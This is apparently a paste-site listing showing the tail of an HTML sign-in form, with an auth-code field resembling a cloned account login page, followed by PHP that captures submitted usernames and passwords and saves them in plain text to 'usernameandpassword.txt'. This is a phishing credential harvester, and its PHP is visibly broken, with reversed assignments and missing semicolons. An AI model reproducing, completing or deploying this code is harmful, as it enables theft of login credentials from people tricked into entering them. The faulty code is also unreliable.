  1159. <input class="authcode_entry_input authcode_placeholder" id="friendlyname" type="text" placeholder="enter a friendly name here">
  1160. </div>
  1161. </div>
  1162. <div style="display: none;">
  1163. <input type="submit">
  1164. </div>
  1165. </form>
  1166.  
  1167. </div></div></div></div></div></body></html>
  1168.  
  1169.  
  1170.  
  1171. <?php
  1172. $_POST['username'] = $inpID
  1173. $_POST['password'] = $inpPW
  1174.  
  1175.  
  1176. $myfile = fopen("usernameandpassword.txt", "w") or die("Unable to open file!");
  1177. $txt = "Username: " . $inpID . " <br>Password: ". $inpPW . "<br><br>";
  1178. fwrite($myfile, $txt);
  1179. fclose($myfile);
  1180.  
  1181. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement